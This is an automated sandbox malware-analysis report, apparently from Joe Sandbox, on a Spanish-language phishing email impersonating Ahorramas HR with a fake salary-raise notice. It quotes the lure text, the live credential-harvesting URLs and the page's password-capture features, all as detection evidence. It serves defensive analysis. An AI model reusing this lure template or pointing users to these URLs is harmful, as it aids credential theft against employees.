Windows Analysis Report
704b67b5-6bc9-dbd5-0710-60eb98e03983.eml

Overview

General Information

Sample name: 704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
Analysis ID: 1556391
MD5: 348b6a46a2bf44ee4bdc077ce4fae7c8
SHA1: ce01869c074679099fbf7dbcfa12761222a9d0e2
SHA256: 5459a8aa83420fb1e0415d196aa163e58abeba21c8f4f1e1888a255a528b0265

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
AI detected potential phishing Email
AI detected suspicious URL
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
Invalid 'forgot password' link found
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry
Submit button contains javascript call

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 2528 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\704b67b5-6bc9-dbd5-0710-60eb98e03983.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "433F257D-565F-4ACE-9A4A-77EDAE2242C0" "841D5194-392F-4B0D-90F2-91DE94DB94BC" "2528" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 3680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2028,i,14780805822871355243,6275632994344914433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2528, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
No Suricata rule has matched

Phishing

Source: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk, Joe Sandbox AI: Score: 9 Reasons: The brand 'AhorrasMas' is a known brand, likely associated with the domain 'ahorramas.com'. The provided URL 'tdmmv2467vengtbhl3e.citq.de' does not match the legitimate domain for AhorrasMas. The URL contains a random string and a different domain extension '.de', which is not typically associated with AhorrasMas. The presence of a subdomain with random characters is a common tactic used in phishing attempts. The input fields labeled as 'unknown' suggest a lack of clear purpose, which is suspicious. DOM: 1.1.pages.csv
Source: Email, Joe Sandbox AI: Detected potential phishing email: The sender's email domain 'denasabuildcon.com' does not match the claimed organization Ahorramas. The email contains suspicious URLs with random strings and redirects through 'citq.de' instead of legitimate ahorramas.com domain. Multiple repetitive content and suspicious formatting suggests automated phishing template
Source: Email, Joe Sandbox AI: AI detected Brand spoofing attempt in URL: https://ahorramas-5ocglii6fvrlmr.wroy.de
Source: Email, Joe Sandbox AI: AI detected Typosquatting in URL: https://ahorramas-5ocglii6fvrlmr.wroy.de
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Number of links: 0
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6HyzvkHTTP Parser: Base64 decoded: 1731664847.000000
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Forgot my password
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Terms of use
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: Invalid link: Privacy & cookies
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: On click: return checkmyEmail()
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: On click: return submitfirst()
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: <input type="password" .../> found
Source: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6HyzvkHTTP Parser: No favicon
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No favicon
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No <meta name="author".. found
Source: https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZrHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:65416 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.16:65352 -> 1.1.1.1:53
Source: global trafficDNS traffic detected: DNS query: tdmmv2467vengtbhl3e.citq.de
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ahorramas-5ocglii6fvrlmr.wroy.de
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: classification engineClassification label: mal56.phis.winEML@25/32@38/117
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241115T0500320420-2528.etl
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\704b67b5-6bc9-dbd5-0710-60eb98e03983.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "433F257D-565F-4ACE-9A4A-77EDAE2242C0" "841D5194-392F-4B0D-90F2-91DE94DB94BC" "2528" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2028,i,14780805822871355243,6275632994344914433,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "433F257D-565F-4ACE-9A4A-77EDAE2242C0" "841D5194-392F-4B0D-90F2-91DE94DB94BC" "2528" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | 1 DLL Side-Loading | 1 Modify Registry | LSASS Memory | 12 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 1 Process Injection | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | Login Hook | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |

No Antivirus matches
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk | true | | unknown |
| https://ahorramas-5ocglii6fvrlmr.wroy.de/8no1e5mntj0ymfgylfo3/7nyedabhzveba2a8xZ2VuL3REbW1WL3ZFbmdUQkhsM2UvRmVybmFuZG8uYmF0dWVjYXMvMjQ2Ny9haG9ycmFtYXMuY29tL1hlNm1wQWRJQUFjdXhVNkh5enZr | false | | unknown |
IP
192.168.2.16
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1556391
Start date and time:2024-11-15 11:00:02 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• EGA enabled
Analysis Mode:stream
Analysis stop reason:Timeout
Sample name:704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
Detection:MAL
Classification:mal56.phis.winEML@25/32@38/117
Cookbook Comments:
• Found application associated with file extension: .eml
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 2.19.126.160, 2.19.126.151, 52.113.194.132, 199.232.214.172
• Excluded domains from analysis (whitelisted): omex.cdn.office.net, ecs.office.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, wu-b-net.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com, a1864.dscd.akamai.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: 704b67b5-6bc9-dbd5-0710-60eb98e03983.eml
Input | Output
URL: email Model: Joe Sandbox AI
{
    "explanation": [
        "The sender's email domain 'denasabuildcon.com' does not match the claimed organization Ahorramas",
        "The email contains suspicious URLs with random strings and redirects through 'citq.de' instead of legitimate ahorramas.com domain",
        "Multiple repetitive content and suspicious formatting suggests automated phishing template"
    ],
    "phishing": true,
    "confidence": 10
}
{
    "date": "Thu, 14 Nov 2024 17:46:13 -1200",
    "subject": "Ahorramas RR.HH.: Notificacin de Mejora Salarial",
    "communications": [
                                            " Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Detalles del Aumento Salarial - Noviembre 2024 body { font-family: Arial, sans-serif; } .container { width: 800px; margin: 0 auto; padding: 20px; border: 1px solid #ddd; border-radius: 5px; } .header, .content, .footer { text-align: center; margin-bottom: 20px; } .elementToProof { border: 0; margin: 0; padding: 12px; background-color: #eaeaea; font-family: Helvetica, Arial, sans-serif; } table { border-collapse: collapse; width: 100%; } th, td { padding: 5px; } th { background-color: #029740; color: #fff; } td { background-color: #f3fff8; } .btn { display: inline-block; padding: 12px 24px; color: #333; background-color: #ffc423; text-decoration: none; border-radius: 2px; font-weight: bold; font-size: 15px; } .btn img { vertical-align: middle; margin-right: 8px; } .footer .message-id { color: #c0c0c0; font-size: 10px; } Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. 
ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 La identidad de este remitente est confirmada por la lista de remitentes de confianza. Detalles del Aumento Salarial - Noviembre 2024 La identidad de este remitente est confirmada por la lista de remitentes de confianza. La identidad de este remitente est confirmada por la lista de remitentes de confianza. La identidad de este remitente est confirmada por la lista de remitentes de confianza. 
Detalles del Aumento Salarial - Noviembre 2024 Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO Documento Recibido Departamento de Recursos Humanos Documento Recibido Departamento de Recursos Humanos REVISAR DOCUMENTO REVISAR DOCUMENTO https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Estimado/a Fernando.batuecas, A continuacin, encontrar los detalles de la hoja de tiempo y su aumento salarial para el mes de Noviembre de 2024. ahorramas.com/Aumento-Salarial-Noviembre ahorramas.com/Aumento-Salarial-Noviembre https://tDmmV2467vEngTBHl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Si tiene alguna consulta, por favor contacte al Departamento de Nmina de Ahorramas. Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Atentamente, Ahorramas Administrador de Nmina de Director de Nmina y RR.HH. | Sede Central https://www.ahorramas.com Message ID: vEngTBHl3e69837tDmmV7099446787 Message ID: vEngTBHl3e69837tDmmV7099446787"
                                        ], 
                                        "from": "Administrador Ahorramas <Billing.kfil@denasabuildcon.com>", 
                                        "to": "fernando.batuecas@ahorramas.com", 
                                        "attachements": []
                                    }
                                    URL: Email Model: Joe Sandbox AI
                                    ```json
                                    {
                                      "contains_trigger_text": true,
                                      "trigger_text": "REVISAR DOCUMENTO",
                                      "prominent_button_name": "unknown",
                                      "text_input_field_labels": [
                                        "Documento Recibido",
                                        "Departamento de Recursos Humanos"
                                      ],
                                      "pdf_icon_visible": true,
                                      "has_visible_captcha": false,
                                      "has_urgent_text": true,
                                      "has_visible_qrcode": false
                                    }
                                    ```
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
                                    {
                                      "contains_trigger_text": true,
                                      "trigger_text": "We need to verify your security before Previewing this document.",
                                      "prominent_button_name": "unknown",
                                      "text_input_field_labels": "unknown",
                                      "pdf_icon_visible": false,
                                      "has_visible_captcha": true,
                                      "has_urgent_text": true,
                                      "has_visible_qrcode": false
                                    }
                                    ```
                                    URL: https://tdmmv2467vengtbhl3e.citq.de Model: Joe Sandbox AI
                                    {
                                        "typosquatting": false,
                                        "unusual_query_string": false,
                                        "suspicious_tld": false,
                                        "ip_in_url": false,
                                        "long_subdomain": true,
                                        "malicious_keywords": false,
                                        "encoded_characters": false,
                                        "redirection": false,
                                        "contains_email_address": false,
                                        "known_domain": false,
                                        "brand_spoofing_attempt": false,
                                        "third_party_hosting": true
                                    }
                                    URL: https://tdmmv2467vengtbhl3e.citq.de
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
                                    {
                                      "brands": [
                                        "AhorrasMas"
                                      ]
                                    }
                                    ```
                                    URL: https://tdmmv2467vengtbhl3e.citq.de/tDmmV/vEngTBHl3e/Xe6mpAdIAAcuxU6Hyzvk1b7xgen/tDmmV/vEngTBHl3e/Fernando.batuecas/2467/ahorramas.com/Xe6mpAdIAAcuxU6Hyzvk Model: Joe Sandbox AI
                                    ```json
                                    {
                                      "brands": [
                                        "Ahorra Mas"
